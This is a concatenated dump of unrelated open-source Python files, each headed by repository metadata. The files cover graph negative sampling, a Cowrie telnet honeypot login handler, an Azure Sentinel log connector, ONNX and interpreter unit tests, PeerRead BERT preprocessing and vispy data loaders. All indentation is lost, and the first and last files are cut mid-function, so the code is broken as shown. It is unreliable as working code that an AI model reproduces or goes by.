r"""Samples a negative edge :obj:`(i,k)` for every positive edge
:obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a
tuple of the form :obj:`(i,j,k)`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: (LongTensor, LongTensor, LongTensor)
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
row, col = edge_index.cpu()
pos_idx = row * num_nodes + col
if not contains_neg_self_loops:
loop_idx = torch.arange(num_nodes) * (num_nodes + 1)
pos_idx = torch.cat([pos_idx, loop_idx], dim=0)
rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long)
neg_idx = row * num_nodes + rand
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = mask.nonzero(as_tuple=False).view(-1)
while rest.numel() > 0: # pragma: no cover
tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long)
rand[rest] = tmp
neg_idx = row[rest] * num_nodes + tmp
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = rest[mask]
return edge_index[0], edge_index[1], rand.to(edge_index.device)
def structured_negative_sampling_feasible(
edge_index: Tensor, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True) -> bool:
r"""Returns :obj:`True` if
:meth:`~torch_geometric.utils.structured_negative_sampling` is feasible
on the graph given by :obj:`edge_index`.
:obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible
if atleast one node is connected to all other nodes.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: bool
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
max_num_neighbors = num_nodes
edge_index = coalesce(edge_index, num_nodes=num_nodes)
if not contains_neg_self_loops:
edge_index, _ = remove_self_loops(edge_index)
max_num_neighbors -= 1 # Reduce number of valid neighbors
deg = degree(edge_index[0], num_nodes)
# True if there exists no node that is connected to all other nodes.
return bool(torch.all(deg < max_num_neighbors))
###############################################################################
def sample(population: int, k: int, device=None) -> Tensor:
if population <= k:
return torch.arange(population, device=device)
else:
return torch.tensor(random.sample(range(population), k), device=device)
def edge_index_to_vector(
edge_index: Tensor,
size: Tuple[int, int],
bipartite: bool,
force_undirected: bool = False,
) -> Tuple[Tensor, int]:
row, col = edge_index
if bipartite: # No need to account for self-loops.
idx = (row * size[1]).add_(col)
population = size[0] * size[1]
return idx, population
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
# We only operate on the upper triangular matrix:
mask = row < col
row, col = row[mask], col[mask]
offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row]
idx = row.mul_(num_nodes).add_(col).sub_(offset)
population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes
return idx, population
else:
assert size[0] == size[1]
num_nodes = size[0]
# We remove self-loops as we do not want to take them into account
# when sampling negative values.
mask = row != col
row, col = row[mask], col[mask]
col[row < col] -= 1
idx = row.mul_(num_nodes - 1).add_(col)
population = num_nodes * num_nodes - num_nodes
return idx, population
def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool,
force_undirected: bool = False) -> Tensor:
if bipartite: # No need to account for self-loops.
row = idx.div(size[1], rounding_mode='floor')
col = idx % size[1]
return torch.stack([row, col], dim=0)
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0)
end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes,
device=idx.device)
row = torch.bucketize(idx, end.sub_(offset), right=True)
col = offset[row].add_(idx) % num_nodes
return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0)
else:
assert size[0] == size[1]
num_nodes = size[0]
row = idx.div(num_nodes - 1, rounding_mode='floor')
col = idx % (num_nodes - 1)
col[row <= col] += 1
return torch.stack([row, col], dim=0)
|
src/cowrie/telnet/userauth.py | uwacyber/cowrie | 2,316 | 9214 | <gh_stars>1000+
# Copyright (C) 2015, 2016 GoSecure Inc.
"""
Telnet Transport and Authentication for the Honeypot
@author: <NAME> <<EMAIL>>
"""
from __future__ import annotations
import struct
from twisted.conch.telnet import (
ECHO,
LINEMODE,
NAWS,
SGA,
AuthenticatingTelnetProtocol,
ITelnetProtocol,
)
from twisted.python import log
from cowrie.core.config import CowrieConfig
from cowrie.core.credentials import UsernamePasswordIP
class HoneyPotTelnetAuthProtocol(AuthenticatingTelnetProtocol):
"""
TelnetAuthProtocol that takes care of Authentication. Once authenticated this
protocol is replaced with HoneyPotTelnetSession.
"""
loginPrompt = b"login: "
passwordPrompt = b"Password: "
windowSize = [40, 80]
def connectionMade(self):
# self.transport.negotiationMap[NAWS] = self.telnet_NAWS
# Initial option negotation. Want something at least for Mirai
# for opt in (NAWS,):
# self.transport.doChain(opt).addErrback(log.err)
# I need to doubly escape here since my underlying
# CowrieTelnetTransport hack would remove it and leave just \n
self.transport.write(self.factory.banner.replace(b"\n", b"\r\r\n"))
self.transport.write(self.loginPrompt)
def connectionLost(self, reason):
"""
Fires on pre-authentication disconnects
"""
AuthenticatingTelnetProtocol.connectionLost(self, reason)
def telnet_User(self, line):
"""
Overridden to conditionally kill 'WILL ECHO' which confuses clients
that don't implement a proper Telnet protocol (most malware)
"""
self.username = line # .decode()
# only send ECHO option if we are chatting with a real Telnet client
self.transport.willChain(ECHO)
# FIXME: this should be configurable or provided via filesystem
self.transport.write(self.passwordPrompt)
return "Password"
def telnet_Password(self, line):
username, password = self.username, line # .decode()
del self.username
def login(ignored):
self.src_ip = self.transport.getPeer().host
creds = UsernamePasswordIP(username, password, self.src_ip)
d = self.portal.login(creds, self.src_ip, ITelnetProtocol)
d.addCallback(self._cbLogin)
d.addErrback(self._ebLogin)
# are we dealing with a real Telnet client?
if self.transport.options:
# stop ECHO
# even if ECHO negotiation fails we still want to attempt a login
# this allows us to support dumb clients which is common in malware
# thus the addBoth: on success and on exception (AlreadyNegotiating)
self.transport.wontChain(ECHO).addBoth(login)
else:
# process login
login("")
return "Discard"
def telnet_Command(self, command):
self.transport.protocol.dataReceived(command + b"\r")
return "Command"
def _cbLogin(self, ial):
"""
Fired on a successful login
"""
interface, protocol, logout = ial
protocol.windowSize = self.windowSize
self.protocol = protocol
self.logout = logout
self.state = "Command"
self.transport.write(b"\n")
# Remove the short timeout of the login prompt.
self.transport.setTimeout(
CowrieConfig.getint("honeypot", "interactive_timeout", fallback=300)
)
# replace myself with avatar protocol
protocol.makeConnection(self.transport)
self.transport.protocol = protocol
def _ebLogin(self, failure):
# TODO: provide a way to have user configurable strings for wrong password
self.transport.wontChain(ECHO)
self.transport.write(b"\nLogin incorrect\n")
self.transport.write(self.loginPrompt)
self.state = "User"
def telnet_NAWS(self, data):
"""
From TelnetBootstrapProtocol in twisted/conch/telnet.py
"""
if len(data) == 4:
width, height = struct.unpack("!HH", b"".join(data))
self.windowSize = [height, width]
else:
log.msg("Wrong number of NAWS bytes")
def enableLocal(self, opt):
if opt == ECHO:
return True
# TODO: check if twisted now supports SGA (see git commit c58056b0)
elif opt == SGA:
return False
else:
return False
def enableRemote(self, opt):
# TODO: check if twisted now supports LINEMODE (see git commit c58056b0)
if opt == LINEMODE:
return False
elif opt == NAWS:
return True
elif opt == SGA:
return True
else:
return False
|
authcheck/app/model/exception.py | flyr4nk/secscan-authcheck | 572 | 9215 | class WebException(Exception):
pass
class ParserException(Exception):
"""
解析异常
"""
pass
class ApiException(Exception):
"""
api异常
"""
pass
class WsException(Exception):
"""
轮询异常
"""
pass
class SsoException(Exception):
"""
sso异常
"""
pass
class LibException(Exception):
"""
lib异常
"""
pass
class AccountException(Exception):
"""
账号异常(账号失效)
"""
pass
class FlowException(Exception):
"""
认证流量异常
"""
pass
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py | johnbilliris/Azure-Sentinel | 2,227 | 9218 | <reponame>johnbilliris/Azure-Sentinel
import re
import base64
import hmac
import hashlib
import logging
import requests
from datetime import datetime
class AzureSentinel:
def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''):
self._workspace_id = workspace_id
self._workspace_key = workspace_key
self._log_type = log_type
if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())):
log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
if not re.match(pattern, str(log_analytics_url)):
raise Exception("Invalid Log Analytics Uri.")
self._log_analytics_url = log_analytics_url
def build_signature(self, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + \
str(content_length) + "\n" + content_type + \
"\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(self._workspace_key)
encoded_hash = base64.b64encode(hmac.new(
decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(
self._workspace_id, encoded_hash)
return authorization
def post_data(self, body):
logging.info('constructing post to send to Azure Sentinel.')
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
logging.info('build signature.')
signature = self.build_signature(
rfc1123date, content_length, method, content_type, resource)
logging.info('signature built.')
uri = self._log_analytics_url + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self._log_type,
'x-ms-date': rfc1123date
}
logging.info('sending post to Azure Sentinel.')
response = requests.post(uri, data=body, headers=headers)
logging.info(response.status_code)
if (response.status_code >= 200 and response.status_code <= 299):
return response.status_code
else:
logging.warn("Events are not processed into Azure. Response code: {}".format(
response.status_code))
raise Exception(
f'Sending to Azure Sentinel failed with status code {response.status_code}')
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py | mmrahorovic/finn | 109 | 9223 | import pytest
from onnx import TensorProto
from onnx import helper as oh
import finn.core.onnx_exec as oxe
from finn.core.modelwrapper import ModelWrapper
from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd
from finn.util.basic import gen_finn_dt_tensor
def create_model(perm):
if perm == [0, 3, 1, 2]:
in_shape = [1, 128, 1, 256]
out_shape = [1, 256, 128, 1]
if perm == [0, 2, 3, 1]:
in_shape = [1, 256, 128, 1]
out_shape = [1, 128, 1, 256]
Transpose1_node = oh.make_node(
"Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm
)
Transpose2_node = oh.make_node(
"Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm
)
Join1_node = oh.make_node(
"Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"]
)
in_transpose1 = oh.make_tensor_value_info(
"in_transpose1", TensorProto.FLOAT, in_shape
)
in_transpose2 = oh.make_tensor_value_info(
"in_transpose2", TensorProto.FLOAT, in_shape
)
out_transpose1 = oh.make_tensor_value_info(
"out_transpose1", TensorProto.FLOAT, out_shape
)
out_transpose2 = oh.make_tensor_value_info(
"out_transpose2", TensorProto.FLOAT, out_shape
)
out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape)
graph = oh.make_graph(
nodes=[Transpose1_node, Transpose2_node, Join1_node],
name="test_graph",
inputs=[in_transpose1, in_transpose2],
outputs=[out_join1],
value_info=[
out_transpose1,
out_transpose2,
],
)
onnx_model = oh.make_model(graph, producer_name="test_model")
model = ModelWrapper(onnx_model)
return model
# Permutation of transpose node
@pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]])
def test_move_identical_op_past_join_op(perm):
model = create_model(perm)
# Create input data
input0_tensor_name = model.graph.input[0].name
input1_tensor_name = model.graph.input[1].name
# Note: it is assumed that both tensors have the same shape and data type
input_shape = model.get_tensor_shape(input0_tensor_name)
input_dtype = model.get_tensor_datatype(input0_tensor_name)
input_val = gen_finn_dt_tensor(input_dtype, input_shape)
input_dict = {}
input_dict[input0_tensor_name] = input_val
input_dict[input1_tensor_name] = input_val
model_transformed = model.transform(MoveTransposePastJoinAdd())
assert oxe.compare_execution(model, model_transformed, input_dict)
# Check if order changed
node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type
node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type
node0_input0_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[0].name
)[0].op_type
node1_input1_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[1].name
)[0].op_type
assert node0_input0_model != node0_input0_model_transformed
assert node1_input1_model != node1_input1_model_transformed
|
part19/test_interpreter.py | fazillatheef/lsbasi | 1,682 | 9241 | import unittest
class LexerTestCase(unittest.TestCase):
def makeLexer(self, text):
from spi import Lexer
lexer = Lexer(text)
return lexer
def test_tokens(self):
from spi import TokenType
records = (
('234', TokenType.INTEGER_CONST, 234),
('3.14', TokenType.REAL_CONST, 3.14),
('*', TokenType.MUL, '*'),
('DIV', TokenType.INTEGER_DIV, 'DIV'),
('/', TokenType.FLOAT_DIV, '/'),
('+', TokenType.PLUS, '+'),
('-', TokenType.MINUS, '-'),
('(', TokenType.LPAREN, '('),
(')', TokenType.RPAREN, ')'),
(':=', TokenType.ASSIGN, ':='),
('.', TokenType.DOT, '.'),
('number', TokenType.ID, 'number'),
(';', TokenType.SEMI, ';'),
('BEGIN', TokenType.BEGIN, 'BEGIN'),
('END', TokenType.END, 'END'),
('PROCEDURE', TokenType.PROCEDURE, 'PROCEDURE'),
)
for text, tok_type, tok_val in records:
lexer = self.makeLexer(text)
token = lexer.get_next_token()
self.assertEqual(token.type, tok_type)
self.assertEqual(token.value, tok_val)
def test_lexer_exception(self):
from spi import LexerError
lexer = self.makeLexer('<')
with self.assertRaises(LexerError):
lexer.get_next_token()
class ParserTestCase(unittest.TestCase):
def makeParser(self, text):
from spi import Lexer, Parser
lexer = Lexer(text)
parser = Parser(lexer)
return parser
def test_expression_invalid_syntax_01(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 10 * ; {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, ';')
self.assertEqual(the_exception.token.lineno, 6)
def test_expression_invalid_syntax_02(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 1 (1 + 2); {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, '(')
self.assertEqual(the_exception.token.lineno, 6)
def test_maximum_one_VAR_block_is_allowed(self):
from spi import ParserError, ErrorCode
# zero VARs
parser = self.makeParser(
"""
PROGRAM Test;
BEGIN
END.
"""
)
parser.parse()
# one VAR
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
END.
"""
)
parser.parse()
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
VAR
b : INTEGER;
BEGIN
a := 5;
b := a + 10;
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, 'VAR')
self.assertEqual(the_exception.token.lineno, 5) # second VAR
class SemanticAnalyzerTestCase(unittest.TestCase):
def runSemanticAnalyzer(self, text):
from spi import Lexer, Parser, SemanticAnalyzer
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
return semantic_analyzer
def test_semantic_duplicate_id_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
a : REAL; {Duplicate identifier}
BEGIN
a := 5;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.DUPLICATE_ID)
self.assertEqual(the_exception.token.value, 'a')
self.assertEqual(the_exception.token.lineno, 5)
def test_semantic_id_not_found_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 5 + b;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.ID_NOT_FOUND)
self.assertEqual(the_exception.token.value, 'b')
class TestCallStack:
def __init__(self):
self._records = []
def push(self, ar):
self._records.append(ar)
def pop(self):
# do nothing
pass
def peek(self):
return self._records[-1]
class InterpreterTestCase(unittest.TestCase):
def makeInterpreter(self, text):
from spi import Lexer, Parser, SemanticAnalyzer, Interpreter
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
interpreter = Interpreter(tree)
interpreter.call_stack = TestCallStack()
return interpreter
def test_integer_arithmetic_expressions(self):
for expr, result in (
('3', 3),
('2 + 7 * 4', 30),
('7 - 8 DIV 4', 5),
('14 + 2 * 3 - 6 DIV 2', 17),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1))', 22),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1)) DIV (2 + 3) - 5 - 3 + (8)', 10),
('7 + (((3 + 2)))', 12),
('- 3', -3),
('+ 3', 3),
('5 - - - + - 3', 8),
('5 - - - + - (3 + 4) - +2', 10),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_float_arithmetic_expressions(self):
for expr, result in (
('3.14', 3.14),
('2.14 + 7 * 4', 30.14),
('7.14 - 8 / 4', 5.14),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : REAL;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_procedure_call(self):
text = """\
program Main;
procedure Alpha(a : integer; b : integer);
var x : integer;
begin
x := (a + b ) * 2;
end;
begin { Main }
Alpha(3 + 5, 7);
end. { Main }
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], 8)
self.assertEqual(ar['b'], 7)
self.assertEqual(ar['x'], 30)
self.assertEqual(ar.nesting_level, 2)
def test_program(self):
text = """\
PROGRAM Part12;
VAR
number : INTEGER;
a, b : INTEGER;
y : REAL;
PROCEDURE P1;
VAR
a : REAL;
k : INTEGER;
PROCEDURE P2;
VAR
a, z : INTEGER;
BEGIN {P2}
z := 777;
END; {P2}
BEGIN {P1}
END; {P1}
BEGIN {Part12}
number := 2;
a := number ;
b := 10 * a + 10 * number DIV 4;
y := 20 / 7 + 3.14
END. {Part12}
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(len(ar.members.keys()), 4)
self.assertEqual(ar['number'], 2)
self.assertEqual(ar['a'], 2)
self.assertEqual(ar['b'], 25)
self.assertAlmostEqual(ar['y'], float(20) / 7 + 3.14) # 5.9971...
if __name__ == '__main__':
unittest.main()
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py | dveni/causal-text-embeddings | 114 | 9248 | <filename>src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
"""
Simple pre-processing for PeerRead papers.
Takes in JSON formatted data from ScienceParse and outputs a tfrecord
Reference example:
https://github.com/tensorlayer/tensorlayer/blob/9528da50dfcaf9f0f81fba9453e488a1e6c8ee8f/examples/data_process/tutorial_tfrecord3.py
"""
import argparse
import glob
import os
import random
import io
import json
from dateutil.parser import parse as parse_date
import tensorflow as tf
import bert.tokenization as tokenization
from PeerRead.ScienceParse.Paper import Paper
from PeerRead.ScienceParse.ScienceParseReader import ScienceParseReader
from PeerRead.data_cleaning.PeerRead_hand_features import get_PeerRead_hand_features
rng = random.Random(0)
def process_json_paper(paper_json_filename, scienceparse_dir, tokenizer):
paper = Paper.from_json(paper_json_filename)
paper.SCIENCEPARSE = ScienceParseReader.read_science_parse(paper.ID, paper.TITLE, paper.ABSTRACT,
scienceparse_dir)
# tokenize PeerRead features
try:
title_tokens = tokenizer.tokenize(paper.TITLE)
except ValueError: # missing titles are quite common sciparse
print("Missing title for " + paper_json_filename)
title_tokens = None
abstract_tokens = tokenizer.tokenize(paper.ABSTRACT)
text_features = {'title': title_tokens,
'abstract': abstract_tokens}
context_features = {'authors': paper.AUTHORS,
'accepted': paper.ACCEPTED,
'name': paper.ID}
# add hand crafted features from PeerRead
pr_hand_features = get_PeerRead_hand_features(paper)
context_features.update(pr_hand_features)
return text_features, context_features
def bert_process_sentence(example_tokens, max_seq_length, tokenizer):
"""
Tokenization and pre-processing of text as expected by Bert
Parameters
----------
example_tokens
max_seq_length
tokenizer
Returns
-------
"""
# Account for [CLS] and [SEP] with "- 2"
if len(example_tokens) > max_seq_length - 2:
example_tokens = example_tokens[0:(max_seq_length - 2)]
# The convention in BERT for single sequences is:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. (vv: Not relevant for us)
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
# vv: segment_ids seem to be the same as type_ids
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in example_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
return input_ids, input_mask, segment_ids
def paper_to_bert_Example(text_features, context_features, max_seq_length, tokenizer):
"""
Parses the input paper into a tf.Example as expected by Bert
Note: the docs for tensorflow Example are awful ¯\_(ツ)_/¯
"""
abstract_features = {}
abstract_tokens, abstract_padding_mask, _ = \
bert_process_sentence(text_features['abstract'], max_seq_length, tokenizer)
abstract_features["token_ids"] = _int64_feature(abstract_tokens)
abstract_features["token_mask"] = _int64_feature(abstract_padding_mask)
# abstract_features["segment_ids"] = create_int_feature(feature.segment_ids) TODO: ommission may cause bugs
# abstract_features["label_ids"] = _int64_feature([feature.label_id])
# non-sequential features
tf_context_features, tf_context_features_types = _dict_of_nonlist_numerical_to_tf_features(context_features)
features = {**tf_context_features, **abstract_features}
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
return tf_example
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
else:
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float_feature(value):
"""Wrapper for inserting a float Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
else:
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto,
e.g, an image in byte
"""
# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _dict_of_nonlist_numerical_to_tf_features(my_dict):
"""
Strip out non-numerical features
Returns tf_features_dict: a dictionary suitable for passing to tf.train.example
tf_types_dict: a dictionary of the tf types of previous dict
"""
tf_types_dict = {}
tf_features_dict = {}
for k, v in my_dict.items():
if isinstance(v, int) or isinstance(v, bool):
tf_features_dict[k] = _int64_feature(v)
tf_types_dict[k] = tf.int64
elif isinstance(v, float):
tf_features_dict[k] = _float_feature(v)
tf_types_dict[k] = tf.float32
else:
pass
return tf_features_dict, tf_types_dict
venues = {'acl': 1,
'conll': 2,
'iclr': 3,
'nips': 4,
'icml': 5,
'emnlp': 6,
'aaai': 7,
'hlt-naacl': 8,
'arxiv': 0}
def _venues(venue_name):
if venue_name.lower() in venues:
return venues[venue_name.lower()]
else:
return -1
def _arxiv_subject(subjects):
subject = subjects[0]
if 'lg' in subject.lower():
return 0
elif 'cl' in subject.lower():
return 1
elif 'ai' in subject.lower():
return 2
else:
raise Exception("arxiv subject not recognized")
def clean_PeerRead_dataset(review_json_dir, parsedpdf_json_dir,
venue, year,
out_dir, out_file,
max_abs_len, tokenizer,
default_accept=1,
is_arxiv = False):
if not os.path.exists(out_dir):
os.makedirs(out_dir)
print('Reading reviews from...', review_json_dir)
paper_json_filenames = sorted(glob.glob('{}/*.json'.format(review_json_dir)))
with tf.python_io.TFRecordWriter(out_dir + "/" + out_file) as writer:
for idx, paper_json_filename in enumerate(paper_json_filenames):
text_features, context_features = process_json_paper(paper_json_filename, parsedpdf_json_dir, tokenizer)
if context_features['accepted'] is None: # missing for conferences other than ICLR (we only see accepts)
context_features['accepted'] = default_accept
many_split = rng.randint(0, 100) # useful for easy data splitting later
# other context features
arxiv = -1
if is_arxiv:
with io.open(paper_json_filename) as json_file:
loaded = json.load(json_file)
year = parse_date(loaded['DATE_OF_SUBMISSION']).year
venue = _venues(loaded['conference'])
arxiv = _arxiv_subject([loaded['SUBJECTS']])
extra_context = {'id': idx, 'venue': venue, 'year': year, 'many_split': many_split,
'arxiv': arxiv}
context_features.update(extra_context)
# turn it into a tf.data example
paper_ex = paper_to_bert_Example(text_features, context_features,
max_seq_length=max_abs_len, tokenizer=tokenizer)
writer.write(paper_ex.SerializeToString())
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--review-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/reviews')
parser.add_argument('--parsedpdf-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/parsed_pdfs')
parser.add_argument('--out-dir', type=str, default='../dat/PeerRead/proc')
parser.add_argument('--out-file', type=str, default='arxiv-all.tf_record')
parser.add_argument('--vocab-file', type=str, default='../../bert/pre-trained/uncased_L-12_H-768_A-12/vocab.txt')
parser.add_argument('--max-abs-len', type=int, default=250)
parser.add_argument('--venue', type=int, default=0)
parser.add_argument('--year', type=int, default=2017)
args = parser.parse_args()
tokenizer = tokenization.FullTokenizer(
vocab_file=args.vocab_file, do_lower_case=True)
clean_PeerRead_dataset(args.review_json_dir, args.parsedpdf_json_dir,
args.venue, args.year,
args.out_dir, args.out_file,
args.max_abs_len, tokenizer, is_arxiv=True)
if __name__ == "__main__":
main()
|
vispy/io/datasets.py | hmaarrfk/vispy | 2,617 | 9274 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from os import path as op
from ..util import load_data_file
# This is the package data dir, not the dir for config, etc.
DATA_DIR = op.join(op.dirname(__file__), '_data')
def load_iris():
"""Load the iris dataset
Returns
-------
iris : NpzFile
data['data'] : a (150, 4) NumPy array with the iris' features
data['group'] : a (150,) NumPy array with the iris' group
"""
return np.load(load_data_file('iris/iris.npz',
force_download='2014-09-04'))
def load_crate():
"""Load an image of a crate
Returns
-------
crate : array
256x256x3 crate image.
"""
return np.load(load_data_file('orig/crate.npz'))['crate']
def pack_unit(value):
"""Packs float values between [0,1] into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
pack = np.zeros(value.shape + (4,), dtype=np.ubyte)
for i in range(4):
value, pack[..., i] = np.modf(value * 256.)
return pack
def pack_ieee(value):
"""Packs float ieee binary representation into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
return np.fromstring(value.tobytes(),
np.ubyte).reshape((value.shape + (4,)))
def load_spatial_filters(packed=True):
"""Load spatial-filters kernel
Parameters
----------
packed : bool
Whether or not the data should be in "packed" representation
for use in GLSL code.
Returns
-------
kernel : array
16x1024x4 (packed float in rgba) or
16x1024 (unpacked float)
16 interpolation kernel with length 1024 each.
names : tuple of strings
Respective interpolation names, plus "Nearest" which does
not require a filter but can still be used
"""
names = ("Bilinear", "Hanning", "Hamming", "Hermite",
"Kaiser", "Quadric", "Bicubic", "CatRom",
"Mitchell", "Spline16", "Spline36", "Gaussian",
"Bessel", "Sinc", "Lanczos", "Blackman", "Nearest")
kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy'))
if packed:
# convert the kernel to a packed representation
kernel = pack_unit(kernel)
return kernel, names
|
plugin/DataExport/extend.py | konradotto/TS | 125 | 9281 | #!/usr/bin/python
# Copyright (C) 2015 Ion Torrent Systems, Inc. All Rights Reserved
import subprocess
import re
pluginName = 'DataExport'
pluginDir = ""
networkFS = ["nfs", "cifs"]
localFS = ["ext4", "ext3", "xfs", "ntfs", "exfat", "vboxsf"]
supportedFS = ",".join(localFS + networkFS)
def test(bucket):
return bucket
def runProcess(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
